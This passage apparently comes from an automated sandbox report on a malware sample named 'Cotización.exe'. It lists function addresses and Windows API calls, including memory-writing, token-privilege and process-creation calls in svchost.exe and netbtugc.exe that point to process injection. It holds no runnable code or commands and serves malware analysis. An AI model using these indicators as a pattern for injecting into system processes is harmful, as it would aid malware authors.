            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2F60 NtCreateProcessEx,4_2_035B2F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2F90 NtProtectVirtualMemory,4_2_035B2F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2FA0 NtQuerySection,4_2_035B2FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2E30 NtWriteVirtualMemory,4_2_035B2E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2EA0 NtAdjustPrivilegesToken,4_2_035B2EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2D00 NtSetInformationFile,4_2_035B2D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2DB0 NtEnumerateKey,4_2_035B2DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2C00 NtQueryInformationProcess,4_2_035B2C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2CC0 NtQueryVirtualMemory,4_2_035B2CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B2CF0 NtOpenProcess,4_2_035B2CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B3010 NtOpenDirectoryObject,4_2_035B3010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B3090 NtSetValueKey,4_2_035B3090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B3D70 NtOpenThread,4_2_035B3D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B3D10 NtOpenProcessToken,4_2_035B3D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02BC8E60 NtReadFile,4_2_02BC8E60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02BC8F50 NtDeleteFile,4_2_02BC8F50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02BC8CF0 NtCreateFile,4_2_02BC8CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02BC9000 NtClose,4_2_02BC9000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02BC9160 NtAllocateVirtualMemory,4_2_02BC9160
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_004096A00_2_004096A0
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0042200C0_2_0042200C
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0041A2170_2_0041A217
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_004122160_2_00412216
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0042435D0_2_0042435D
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_004033C00_2_004033C0
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0044F4300_2_0044F430
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_004125E80_2_004125E8
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0044663B0_2_0044663B
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_004138010_2_00413801
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0042096F0_2_0042096F
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_004129D00_2_004129D0
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_004119E30_2_004119E3
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0041C9AE0_2_0041C9AE
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0047EA6F0_2_0047EA6F
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0040FA100_2_0040FA10
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0044EB5F0_2_0044EB5F
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_00423C810_2_00423C81
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_00411E780_2_00411E78
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_00442E0C0_2_00442E0C
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_00420EC00_2_00420EC0
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0044CF170_2_0044CF17
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_00444FD20_2_00444FD2
            Source: C:\Users\user\Desktop\Cotizaci#U00f3n.exeCode function: 0_2_0406D2100_2_0406D210
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004181132_2_00418113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F9C32_2_0040F9C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F9BC2_2_0040F9BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004022092_2_00402209
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004022102_2_00402210
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004162FE2_2_004162FE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004162BC2_2_004162BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004163032_2_00416303
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FBE32_2_0040FBE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DC632_2_0040DC63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402DC02_2_00402DC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E6532_2_0042E653
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA3522_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F02_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037003E62_2_037003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E02742_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C02C02_2_036C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C81582_2_036C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036301002_2_03630100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA1182_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F81CC2_2_036F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F41A22_2_036F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037001AA2_2_037001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D20002_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036407702_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036647502_2_03664750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C7C02_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C6E02_2_0365C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036405352_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037005912_2_03700591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F24462_2_036F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E44202_2_036E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EE4F62_2_036EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FAB402_2_036FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F6BD72_2_036F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA802_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036569622_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A02_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370A9A62_2_0370A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364A8402_2_0364A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036428402_2_03642840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E8F02_2_0366E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036268B82_2_036268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4F402_2_036B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03682F282_2_03682F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660F302_2_03660F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E2F302_2_036E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364CFE02_2_0364CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632FC82_2_03632FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BEFA02_2_036BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640E592_2_03640E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FEE262_2_036FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FEEDB2_2_036FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652E902_2_03652E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FCE932_2_036FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364AD002_2_0364AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DCD1F2_2_036DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363ADE02_2_0363ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03658DBF2_2_03658DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640C002_2_03640C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630CF22_2_03630CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0CB52_2_036E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362D34C2_2_0362D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F132D2_2_036F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0368739A2_2_0368739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E12ED2_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B2C02_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036452A02_2_036452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367516C2_2_0367516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F1722_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370B16B2_2_0370B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364B1B02_2_0364B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F70E92_2_036F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF0E02_2_036FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EF0CC2_2_036EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036470C02_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF7B02_2_036FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036856302_2_03685630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F16CC2_2_036F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F75712_2_036F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037095C32_2_037095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DD5B02_2_036DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036314602_2_03631460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF43F2_2_036FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFB762_2_036FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B5BF02_2_036B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367DBF92_2_0367DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365FB802_2_0365FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B3A6C2_2_036B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFA492_2_036FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F7A462_2_036F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EDAC62_2_036EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DDAAC2_2_036DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03685AA02_2_03685AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E1AA32_2_036E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036499502_2_03649950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B9502_2_0365B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D59102_2_036D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AD8002_2_036AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036438E02_2_036438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFF092_2_036FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03603FD22_2_03603FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03603FD52_2_03603FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFFB12_2_036FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03641F922_2_03641F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03649EB02_2_03649EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F7D732_2_036F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03643D402_2_03643D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F1D5A2_2_036F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365FDC02_2_0365FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B9C322_2_036B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFCF22_2_036FFCF2
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeCode function: 3_2_02DB922E3_2_02DB922E
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeCode function: 3_2_02DBB2013_2_02DBB201
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeCode function: 3_2_02DC18DA3_2_02DC18DA
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeCode function: 3_2_02DC191C3_2_02DC191C
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeCode function: 3_2_02DC19213_2_02DC1921
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeCode function: 3_2_02DBAFDA3_2_02DBAFDA
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeCode function: 3_2_02DBAFE13_2_02DBAFE1
            Source: C:\Program Files (x86)\TUzHmnuaHTHRbPPYFSTKvYJAKoZmULxLVwwRTZuZUTb\UOIRaMZSIyDCj.exeCode function: 3_2_02DD9C713_2_02DD9C71
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0363A3524_2_0363A352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036403E64_2_036403E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0358E3F04_2_0358E3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036202744_2_03620274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036002C04_2_036002C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036081584_2_03608158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035701004_2_03570100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0361A1184_2_0361A118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036381CC4_2_036381CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036341A24_2_036341A2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036401AA4_2_036401AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036120004_2_03612000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035A47504_2_035A4750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035807704_2_03580770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0357C7C04_2_0357C7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0359C6E04_2_0359C6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035805354_2_03580535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036405914_2_03640591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036324464_2_03632446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036244204_2_03624420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0362E4F64_2_0362E4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0363AB404_2_0363AB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03636BD74_2_03636BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0357EA804_2_0357EA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035969624_2_03596962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0364A9A64_2_0364A9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035829A04_2_035829A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0358A8404_2_0358A840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035828404_2_03582840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035AE8F04_2_035AE8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035668B84_2_035668B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035F4F404_2_035F4F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03622F304_2_03622F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035A0F304_2_035A0F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035C2F284_2_035C2F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03572FC84_2_03572FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0358CFE04_2_0358CFE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035FEFA04_2_035FEFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03580E594_2_03580E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0363EE264_2_0363EE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0363EEDB4_2_0363EEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03592E904_2_03592E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0363CE934_2_0363CE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0358AD004_2_0358AD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0361CD1F4_2_0361CD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0357ADE04_2_0357ADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03598DBF4_2_03598DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03580C004_2_03580C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03570CF24_2_03570CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03620CB54_2_03620CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0356D34C4_2_0356D34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0363132D4_2_0363132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035C739A4_2_035C739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036212ED4_2_036212ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0359B2C04_2_0359B2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035852A04_2_035852A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0364B16B4_2_0364B16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0356F1724_2_0356F172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035B516C4_2_035B516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0358B1B04_2_0358B1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0363F0E04_2_0363F0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036370E94_2_036370E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035870C04_2_035870C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0362F0CC4_2_0362F0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0363F7B04_2_0363F7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035C56304_2_035C5630
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036316CC4_2_036316CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036375714_2_03637571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036495C34_2_036495C3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0361D5B04_2_0361D5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035714604_2_03571460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0363F43F4_2_0363F43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0363FB764_2_0363FB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035BDBF94_2_035BDBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035F5BF04_2_035F5BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0359FB804_2_0359FB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03637A464_2_03637A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0363FA494_2_0363FA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035F3A6C4_2_035F3A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0362DAC64_2_0362DAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03621AA34_2_03621AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0361DAAC4_2_0361DAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035C5AA04_2_035C5AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035899504_2_03589950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0359B9504_2_0359B950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035ED8004_2_035ED800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035838E04_2_035838E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0363FF094_2_0363FF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03543FD54_2_03543FD5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03543FD24_2_03543FD2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03581F924_2_03581F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0363FFB14_2_0363FFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03589EB04_2_03589EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03637D734_2_03637D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03583D404_2_03583D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03631D5A4_2_03631D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0359FDC04_2_0359FDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_035F9C324_2_035F9C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0363FCF24_2_0363FCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02BB1A304_2_02BB1A30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02BACB804_2_02BACB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02BAC9604_2_02BAC960
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02BAC9594_2_02BAC959
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02BAAC004_2_02BAAC00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02BB32A04_2_02BB32A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02BB329B4_2_02BB329B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02BB32594_2_02BB3259
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02BB50B04_2_02BB50B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02BCB5F04_2_02BCB5F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_033EE3384_2_033EE338
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_033EE7EC4_2_033EE7EC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_033EE4534_2_033EE453
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_033ECB034_2_033ECB03
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_033ECAAB4_2_033ECAAB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_033ED8584_2_033ED858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 111 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 035C7E54 appears 111 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 035FF290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 035EEA12 appears 86 times
